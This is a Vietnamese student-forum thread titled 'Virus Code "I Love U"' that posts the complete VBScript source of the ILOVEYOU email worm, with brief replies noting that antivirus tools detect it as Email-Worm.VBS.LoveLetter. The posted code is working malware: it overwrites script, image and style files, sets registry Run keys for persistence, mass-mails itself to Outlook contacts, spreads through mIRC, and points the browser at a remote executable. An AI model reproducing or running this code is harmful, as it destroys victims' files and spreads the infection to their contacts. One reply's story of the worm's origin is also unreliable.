1. THÔNG BÁO TUYỂN ADMIN DIỄN ĐÀN 2013
  Tìm kiếm nhà trọ - Ở ghép
  THÔNG BÁO BÁN ÁO SPKT.NET CHO THÀNH VIÊN DIỄN ĐÀN


  HÃY TÌM KIẾM Ở ĐÂY TRƯỚC KHI ĐẶT CÂU HỎI
  {xen:phrase loading}

Virus Code "I Love U"

Thảo luận trong 'Lập trình' bắt đầu bởi hyl1182006, 28 Tháng mười 2006.

 1. hyl1182006 Guest

  Số bài viết: 0
  Đã được thích: 0
  Điểm thành tích: 0
  rem barok -loveletter(vbe) <i hate go to school>
  rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group /
  Manila,Philippines
  On Error Resume Next
  dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
  eq=""
  ctr=0
  Set fso = CreateObject("Scripting.FileSystemObject")
  set file = fso_OpenTextFile(WScript.ScriptFullname,1)
  vbscopy=file.ReadAll
  main()
  sub main()
  On Error Resume Next
  dim wscr,rr
  set wscr=CreateObject("WScript.Shell")
  rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
  Host\Settings\Timeout")
  if (rr>=1) then
  wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
  Host\Settings\Timeout",0,"REG_DWORD"
  end if
  Set dirwin = fso.GetSpecialFolder(0)
  Set dirsystem = fso.GetSpecialFolder(1)
  Set dirtemp = fso.GetSpecialFolder(2)
  Set c = fso.GetFile(WScript.ScriptFullName)
  c.Copy(dirsystem&"\MSKernel32.vbs")
  c.Copy(dirwin&"\Win32DLL.vbs")
  c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
  regruns()
  html()
  spreadtoemail()
  listadriv()
  end sub
  sub regruns()
  On Error Resume Next
  Dim num,downread
  regcreate
  "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32
  ",dirsystem&"\MSKernel32.vbs"
  regcreate
  "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Wi
  n32DLL",dirwin&"\Win32DLL.vbs"
  downread=""
  downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet
  Explorer\Download Directory")
  if (downread="") then
  downread="c:\"
  end if
  if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
  Randomize
  num = Int((4 * Rnd) + 1)
  if num = 1 then
  regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
  Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnj
  w6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
  elseif num = 2 then
  regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
  Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe
  546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
  elseif num = 3 then
  regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
  Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnm
  POhfgER67b3Vbvg/WIN-BUGSFIX.exe"
  elseif num = 4 then
  regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
  Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkh
  YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX
  .exe"
  end if
  end if
  if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
  regcreate
  "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFI
  X",downread&"\WIN-BUGSFIX.exe"
  regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start
  Page","about:blank"
  end if
  end sub
  sub listadriv
  On Error Resume Next
  Dim d,dc,s
  Set dc = fso.Drives
  For Each d in dc
  If d.DriveType = 2 or d.DriveType=3 Then
  folderlist(d.path&"\")
  end if
  Next
  listadriv = s
  end sub
  sub infectfiles(folderspec)
  On Error Resume Next
  dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
  set f = fso.GetFolder(folderspec)
  set fc = f.Files
  for each f1 in fc
  ext=fso.GetExtensionName(f1.path)
  ext=lcase(ext)
  s=lcase(f1.name)
  if (ext="vbs") or (ext="vbe") then
  set ap=fso_OpenTextFile(f1.path,2,true)
  ap.write vbscopy
  ap.close
  elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct")
  or (ext="hta") then
  set ap=fso_OpenTextFile(f1.path,2,true)
  ap.write vbscopy
  ap.close
  bname=fso.GetBaseName(f1.path)
  set cop=fso.GetFile(f1.path)
  cop.copy(folderspec&"\"&bname&".vbs")
  fso.DeleteFile(f1.path)
  elseif(ext="jpg") or (ext="jpeg") then
  set ap=fso_OpenTextFile(f1.path,2,true)
  ap.write vbscopy
  ap.close
  set cop=fso.GetFile(f1.path)
  cop.copy(f1.path&".vbs")
  fso.DeleteFile(f1.path)
  elseif(ext="mp3") or (ext="mp2") then
  set mp3=fso.CreateTextFile(f1.path&".vbs")
  mp3.write vbscopy
  mp3.close
  set att=fso.GetFile(f1.path)
  att.attributes=att.attributes+2
  end if
  if (eq<>folderspec) then
  if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or
  (s="script.ini") or (s="mirc.hlp") then
  set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
  scriptini.WriteLine "[script]"
  scriptini.WriteLine ";mIRC Script"
  scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt,
  if mIRC will"
  scriptini.WriteLine " corrupt... WINDOWS will affect and will not run
  correctly. thanks"
  scriptini.WriteLine ";"
  scriptini.WriteLine ";Khaled Mardam-Bey"
  scriptini.WriteLine ";http://www.mirc.com"
  scriptini.WriteLine ";"
  scriptini.WriteLine "n0=on 1:JOIN:#:{"
  scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
  scriptini.WriteLine "n2= /.dcc send $nick
  "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
  scriptini.WriteLine "n3=}"
  scriptini.close
  eq=folderspec
  end if
  end if
  next
  end sub
  sub folderlist(folderspec)
  On Error Resume Next
  dim f,f1,sf
  set f = fso.GetFolder(folderspec)
  set sf = f.SubFolders
  for each f1 in sf
  infectfiles(f1.path)
  folderlist(f1.path)
  next
  end sub
  sub regcreate(regkey,regvalue)
  Set regedit = CreateObject("WScript.Shell")
  regedit.RegWrite regkey,regvalue
  end sub
  function regget(value)
  Set regedit = CreateObject("WScript.Shell")
  regget=regedit.RegRead(value)
  end function
  function fileexist(filespec)
  On Error Resume Next
  dim msg
  if (fso.FileExists(filespec)) Then
  msg = 0
  else
  msg = 1
  end if
  fileexist = msg
  end function
  function folderexist(folderspec)
  On Error Resume Next
  dim msg
  if (fso.GetFolderExists(folderspec)) then
  msg = 0
  else
  msg = 1
  end if
  fileexist = msg
  end function
  sub spreadtoemail()
  On Error Resume Next
  dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
  set regedit=CreateObject("WScript.Shell")
  set out=WScript.CreateObject("Outlook.Application")
  set mapi=out.GetNameSpace("MAPI")
  for ctrlists=1 to mapi.AddressLists.Count
  set a=mapi.AddressLists(ctrlists)
  x=1
  regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
  if (regv="") then
  regv=1
  end if
  if (int(a.AddressEntries.Count)>int(regv)) then
  for ctrentries=1 to a.AddressEntries.Count
  malead=a.AddressEntries(x)
  regad=""
  regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
  if (regad="") then
  set male=out.CreateItem(0)
  male.Recipients.Add(malead)
  male.Subject = "ILOVEYOU"
  male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
  male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
  male.Send
  regedit.RegWrite
  "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
  end if
  x=x+1
  next
  regedit.RegWrite
  "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
  else
  regedit.RegWrite
  "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
  end if
  next
  Set out=Nothing
  Set mapi=Nothing
  end sub
  sub html
  On Error Resume Next
  dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
  dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META
  NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _
  "<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-?
  @GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _
  "<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is
  good...@-@>"&vbcrlf& _
  "<?-?HEAD><BODY
  ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#
  -#,#-#main#-#)@-@ "&vbcrlf& _
  "ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#
  -#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _
  "<CENTER>

  This HTML file need ActiveX Control<?-?p>

  To Enable to read
  this HTML file
  - Please press #-#YES#-# button to Enable
  ActiveX<?-?p>"&vbcrlf& _
  "<?-?CENTER><MARQUEE LOOP=@-@infinite@-@
  BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEE>
  "&vbcrlf& _
  "<?-?BODY><?-?HTML>"&vbcrlf& _
  "<script language=@-@JScript@-@>"&vbcrlf& _
  "<!--?-??-?"&vbcrlf& _
  "if (window.screen){var wi=screen.availWidth;var
  hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf& _
  "?-??-?-->"&vbcrlf& _
  "<?-?SCRIPT>"&vbcrlf& _
  "<script LANGUAGE=@-@VBScript@-@>"&vbcrlf& _
  "<!--"&vbcrlf& _
  "on error resume next"&vbcrlf& _
  "dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _
  "aw=1"&vbcrlf& _
  "code="
  dta2="set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _
  "set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _
  "code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _
  "code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _
  "code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _
  "set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _
  "wri.write code4"&vbcrlf& _
  "wri.close"&vbcrlf& _
  "if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _
  "if (err.number=424) then"&vbcrlf& _
  "aw=0"&vbcrlf& _
  "end if"&vbcrlf& _
  "if (aw=1) then"&vbcrlf& _
  "document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _
  "window.close"&vbcrlf& _
  "end if"&vbcrlf& _
  "end if"&vbcrlf& _
  "Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _
  "regedit.RegWrite
  @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Ru
  n^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _
  "?-??-?-->"&vbcrlf& _
  "<?-?SCRIPT>"
  dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
  dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")
  dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
  dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")
  dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
  dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")
  dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
  dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")
  set fso=CreateObject("Scripting.FileSystemObject")
  set c=fso_OpenTextFile(WScript.ScriptFullName,1)
  lines=Split(c.ReadAll,vbcrlf)
  l1=ubound(lines)
  for n=0 to ubound(lines)
  lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91))
  lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
  lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37))
  if (l1=n) then
  lines(n)=chr(34)+lines(n)+chr(34)
  else
  lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"
  end if
  next
  set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM")
  b.close
  set d=fso_OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2)
  d.write dt5
  d.write join(lines,vbcrlf)
  d.write vbcrlf
  d.write dt6
  d.close
  end sub
 2. lev Guest

  Số bài viết: 0
  Đã được thích: 0
  Điểm thành tích: 0
 3. hoangtulai_hp Guest

  Số bài viết: 0
  Đã được thích: 0
  Điểm thành tích: 0
 4. DKhanh13 New Member

  Số bài viết: 56
  Đã được thích: 0
  Điểm thành tích: 0
  Cái này hình như là virus thiệt á. Em sử dụng NOD32 Antivirus, khi vào thread này nó cảnh báo virus rồi terminate connection luôn.

  Copy đoạn code trên lưu lại thành file virus.vbs và scan trên trang web kapersky nó ra kết quả như vầy:
  --------------------------------------------------------------------------------------------------
  If you would like to scan your entire computer for viruses, please use our free virus scan.
  Attention!

  Kaspersky Anti-Virus has detected a virus in the file you have submitted.
  We suggest that you consider:

  • Reading about the virus/viruses in our Virus Encyclopedia
  • Downloading a trial version of Kaspersky Anti-Virus
  • Purchasing a copy of Kaspersky Anti-Virus in our E-Store
  • Purchasing Kaspersky Anti-Virus from a certified partner

  Scanned file: virus.vbs - Infected
  virus.vbs - infected by Email-Worm.VBS.LoveLetter

  Statistics:

  Known viruses:2265298 Updated:28-05-2009 File size (Kb):10 Virus bodies:1 Files:1 Warnings:0 Archives:0 Suspicious:0----------------------------------------------------------------------------------------------------
 5. rptdnmqs New Member

  Số bài viết: 15
  Đã được thích: 0
  Điểm thành tích: 0
  cái này 99 dòng ấy mà có 1 pháp sư bên mĩ trường đại học gì đó ,anh ta ko có tình yêu nên đã làm con này tuy nó ít dòng thế mà gần đánh sập mạng của 1 bang đó

Chia sẻ trang này